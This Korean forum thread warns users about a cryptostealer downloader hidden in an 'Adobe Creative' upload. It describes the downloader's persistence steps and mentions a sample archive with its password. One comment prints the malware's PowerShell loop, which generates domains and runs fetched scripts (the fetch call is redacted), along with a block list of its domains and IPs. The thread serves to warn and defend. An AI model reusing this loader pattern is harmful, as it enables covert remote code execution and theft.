자유 게시판

자료실 Adobe Creative... 악성코드 주의

2022.11.21 12:27

한우우웅 조회:4880 추천:14

윈도우 포럼 관리자님 공지사항에 올려주세요.

현재 국내, 외국 백신들 모두 우회 상태 입니다.

https://windowsforum.kr/index.php?mid=data&search_keyword=Adobe+Creative&search_target=title_content&document_srl=18621091

조회:2755 추천:23

자료 올린 사람도 모르는거 같습니다. 피해자 많을것으로 추정.

connection blocker.exe 악성 코드 파일 입니다.

종료 할때 아래 작업들을 수행 합니다. (가상 환경에서는 작동 안함)

1. C:\Windows\System32 에 랜덤 문자열.ps1 생성

2. 작업 스케줄러 Microsoft\Windows\랜덤 작업 생성 (사진 없음)

3. 기존에 있는 레지스트리 이름 뒤에 랜덤 문자열 붙여서 생성

4. powershell.exe 실행되면서 C&C 서버로 추정되는 IP 연결 후 대기 상태

(powershell.exe 바로 실행 안함. 어느 정도 시간이 지난 후에 실행 됩니다.)

C:\Windows\System32\랜덤 이름.ps1 수동 실행 모습 입니다.

추가 된 레지스트리에 자세한 정보가 있는걸로 추정 됩니다.

아직 분석을 자세히 못해서 어떠한 역할을 수행하는지는 모르겠으나 정상적인 파일이라면 절대 이런 식으로 작동 안 합니다.

악성코드 셈플 비번 : 1234

https://windowsforum.kr/free/18735087 홈으로 위로 목록

댓글 [18]

시종일관 2022.11.21 13:16

좋은 정보 감사합니다.
이제라도 더 큰 피해를 막을 수 있었네요 ^^
움막의거지 2022.11.21 13:52

감사합니다
내꼬 2022.11.21 13:53

추가로 경고 합니다.
최근 올라온 리팩/포터블 자료에 본문과 같은 악성코드 있습니다.
포럼 자료실에 업로드 하시는분들 자료 검증 안하고 올립니다.
1. 누가 다운 받아 쓰래?
2. 다운받아 쓰는건 당신 책임이야!
이니까 누굴 탓하지 마세요.
배포자나 사용자나 똑같습니다.
gooddew 2022.11.21 15:40

관련 게시물은 삭제 했기 때문에 자유 게시판으로 이동합니다.
한우우웅 2022.11.21 16:48

기존 감염자들을 위해서 공지 한번 써주세요ㅠ

조회, 추천 수 보니 많이 받은거 같은데요

백신이 치료해주면 고마운데 그것도 아닌 상황이라서요
DarknessAngel 2022.11.21 16:50

~~작동 상태 보니 전형적 다운로더로 추정되네요~~

정기적으로 정해진 C&C에서 스크립트 받은후 그걸 실행해서 추가로 다른걸 받아오는듯합니다

저런것 1개 걸리면 악성코드 폭탄 선물 받을 수 도 있습니다

셈플중 dll은 정상적인 파일로 보이고, 특정 명령을 내렸을때 백신이 감지하는걸 막기 위해 정상적으로 서명된 잘 알려진 파일을 이용한듯합니다

exe는 zip sfx를 수정한걸로 보이고, Adobe계열의 소프트가 실행시 저 파일명을 호출하는걸 이용해서 실행하게 해둔듯합니다 (압축이 안 풀리는데, 내부에 정상 + @를 넣었거나, 정상 파일을 다른 이름으로 변경후 그걸 호출하는 구조로 추정됩니다 (용량 고려시 전자일듯합니다) )

--------------------------------------------------------------------------

while ($true) {
try {
      foreach ($c in (@("com", "xyz"))) {
          foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
              foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                  try {
                      $h = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
                      $r = [deleted – this is the Invoke-RestMethod bit]
                      if ($r -ne '') {
                          Start-Job ([ScriptBlock]::Create($r)) | Wait-Job -Timeout 7200
                          break;
                      }
                  }
                  catch {
                  }
              }
          }
      }
}
catch {
}
Start-Sleep -Seconds 5;

의 구조로 도메인 접근하네요 (경우의 수로 50가지 조합이 나옵니다)

--------------------------------------------------------------------------

ahoravideo-blog.com #Powershell Cryptostealer
ahoravideo-blog.xyz #Powershell Cryptostealer
ahoravideo-chat.com #Powershell Cryptostealer
ahoravideo-chat.xyz #Powershell Cryptostealer
ahoravideo-cdn.com #Powershell Cryptostealer
ahoravideo-cdn.xyz #Powershell Cryptostealer
ahoravideo-endpoint.com #Powershell Cryptostealer
ahoravideo-endpoint.xyz #Powershell Cryptostealer
ahoravideo-schnellvpn.com #Powershell Cryptostealer
ahoravideo-schnellvpn.xyz #Powershell Cryptostealer
bideo-blog.com #Powershell Cryptostealer
bideo-blog.xyz #Powershell Cryptostealer
bideo-chat.com #Powershell Cryptostealer
bideo-chat.xyz #Powershell Cryptostealer
bideo-cdn.com #Powershell Cryptostealer
bideo-cdn.xyz #Powershell Cryptostealer
bideo-endpoint.com #Powershell Cryptostealer
bideo-endpoint.xyz #Powershell Cryptostealer
bideo-schnellvpn.com #Powershell Cryptostealer
bideo-schnellvpn.xyz #Powershell Cryptostealer
fairu-blog.com #Powershell Cryptostealer
fairu-blog.xyz #Powershell Cryptostealer
fairu-chat.com #Powershell Cryptostealer
fairu-chat.xyz #Powershell Cryptostealer
fairu-cdn.com #Powershell Cryptostealer
fairu-cdn.xyz #Powershell Cryptostealer
fairu-endpoint.com #Powershell Cryptostealer
fairu-endpoint.xyz #Powershell Cryptostealer
fairu-schnellvpn.com #Powershell Cryptostealer
fairu-schnellvpn.xyz #Powershell Cryptostealer
privatproxy-blog.com #Powershell Cryptostealer
privatproxy-blog.xyz #Powershell Cryptostealer
privatproxy-chat.com #Powershell Cryptostealer
privatproxy-chat.xyz #Powershell Cryptostealer
privatproxy-cdn.com #Powershell Cryptostealer
privatproxy-cdn.xyz #Powershell Cryptostealer
privatproxy-endpoint.com #Powershell Cryptostealer
privatproxy-endpoint.xyz #Powershell Cryptostealer
privatproxy-schnellvpn.com #Powershell Cryptostealer
privatproxy-schnellvpn.xyz #Powershell Cryptostealer
wmail-blog.com #Powershell Cryptostealer
wmail-blog.xyz #Powershell Cryptostealer
wmail-chat.com #Powershell Cryptostealer
wmail-chat.xyz #Powershell Cryptostealer
wmail-cdn.com #Powershell Cryptostealer
wmail-cdn.xyz #Powershell Cryptostealer
wmail-endpoint.com #Powershell Cryptostealer
wmail-endpoint.xyz #Powershell Cryptostealer
wmail-schnellvpn.com #Powershell Cryptostealer
wmail-schnellvpn.xyz #Powershell Cryptostealer

91.195.240.103 #Powershell Cryptostealer
107.161.23.204 #Powershell Cryptostealer
109.68.33.25 #Powershell Cryptostealer
154.53.51.77 #Powershell Cryptostealer
172.64.142.15 #Powershell Cryptostealer
192.64.119.130 #Powershell Cryptostealer
192.161.187.200 #Powershell Cryptostealer
193.239.84.207 #Powershell Cryptostealer
209.141.38.71 #Powershell Cryptostealer
이상을 차단해주세요

일부만 온라인인데, 그냥 다 막아버리는걸 추천합니다

--------------------------------------------------------------------------

불운하게도 현시점에서 모든 백신을 다 우회 가능합니다 (Eset 잡아내네요)

유포중인 차단용 hosts및 방화벽 목록에 반영해서 ~~오늘 새버전 올라갑니다~~

https://blog.dateno1.com/?p=849

새버전 올림
한우우웅 2022.11.21 17:13

굿 입니다.

바이러스토탈 돌리니까 어떤 백신도 못 잡고 있는 현실이네요.
DarknessAngel 2022.11.21 17:17

https://www.reddit.com/r/nextdns/comments/w3bv2u/laptop_trying_to_connect_to_these_kinds_of

국내외 다 문제되고 있습니다

https://www.pluribus-one.it/company/blog/84-cybersecurity/150-detecting-powershell-cryptostealer

보안 관련된곳에서도 일부 다루지만, 아직 메이저에선 언급되진 않네요

저넘은 백신이 못 막지만, 다행히 저넘이 받아오는 파일은 악성이라고 막히네요
- Kaspersky.png (127.8KB)(2)
한우우웅 2022.11.21 17:29

윈도우 디펜더가 잡아줘도 많은 컴퓨터가 치료 될텐데요..ㅠㅠ
DarknessAngel 2022.11.21 17:41

그걸 막기 위해 정상 서명된 dll을 쓰고 있습니다
브라이트 2022.11.21 21:28

저 걸린걸까요??
- ps1.JPG (246.8KB)(5)
큰돌 2022.11.21 22:21

정상적인 파일로 원래 있는 것들입니다.
rthgh 2022.11.21 23:08

저것 cmd 명령어 검사기 만들어수 없나요?

만들어 주실분 없나요..
붉바리 2022.11.21 23:17

감사합니다.
강태공33 2022.11.22 11:00

저도 보고싶은데 어디서 다운받을 수 있나요?

taesoo@sanseo.shop
한우우웅 2022.11.22 11:04

첨부 파일에 셈플 있습니다 비번 1234
Lr라 2022.12.07 21:22

프로그램을 추가 분석해보니 curl로 파일을 강제로 받는게 보여지네요.

그냥 가볍게 스트링 분석한 결과만 올려드립니다.
- 스트링 분석.txt (68.9KB)(159)
한우우웅 2022.12.10 00:16

굿!

홈으로 위로 목록

번호	제목	글쓴이	조회	등록일
[공지]	자유 게시판 이용간 유의사항 (정치, 종교, 시사 게시물 자제) [1]	gooddew	-	-
44539	Worldcup 응원 PE [51]	RainbowCha	1648	11-23
44538	저도 한때는... [4]	테츠로	725	11-23
44537	길거리 응원이 가능하다고 하네요. [1]	도뽱	310	11-23
44536	어제 FSCapture 스크롤캡쳐 에 대해서 [9]	둥근호박	909	11-23
44535	매일 보이시던 분이 안보이시네요. [5]	샤방	1442	11-23
44534	씁쓸함......... 그것은 [5]	빨강모자	825	11-23
44533	이번에야말로 [5]	DarknessAn	966	11-23
44532	황당한 배민 주문자의 메모 [4]	긍지버림	1177	11-22
44531	PC 에 영상을 티비로 볼수 있는 방법이 있나요? (무선으로..) [9]	좀머씨	1540	11-22
44530	반디 집을 구매 해볼까 합니다.. [17]	테츠로	1674	11-22
44529	리눅스를 vhd 부팅이 가능하게 부트로더를 만지다 포기한적... [8]	Neutrino	507	11-21
44528	이셋 백신은 이슈된 악성코드 차단 합니다. [7]	내꼬	1555	11-21
44527	와*님 스샷게에 윈11 커스텀OS 요 [4]	읍민Kaine	888	11-21
44526	저작권 위반 단속	내꼬	2158	11-21
»	자료실 Adobe Creative... 악성코드 주의 [18]	한우우웅	4880	11-21
44524	VM 17 매핑이 되나여? map [2]	컴아저씨훈	349	11-21
44523	국가기술자격 시험 인정신분증에 PASS 주민등록증 확인서비... [1]	asklee	837	11-21
44522	내가 조립한 컴비용	앙앙잉잉	1077	11-21
44521	첨xx 님 덕분에... [9]	메인보드	1122	11-20
44520	3가지.... [42]	첨임다	1473	11-20

첫 페이지 170 171 172 173 174 175 176 177 178 179 끝 페이지

홈으로 위로 목록

자료실 Adobe Creative... 악성코드 주의

댓글 [18]

시종일관 2022.11.21 13:16

움막의거지 2022.11.21 13:52

내꼬 2022.11.21 13:53

gooddew 2022.11.21 15:40

한우우웅 2022.11.21 16:48

DarknessAngel 2022.11.21 16:50

한우우웅 2022.11.21 17:13

DarknessAngel 2022.11.21 17:17

한우우웅 2022.11.21 17:29

DarknessAngel 2022.11.21 17:41

브라이트 2022.11.21 21:28

큰돌 2022.11.21 22:21

rthgh 2022.11.21 23:08

붉바리 2022.11.21 23:17

강태공33 2022.11.22 11:00

한우우웅 2022.11.22 11:04

Lr라 2022.12.07 21:22

한우우웅 2022.12.10 00:16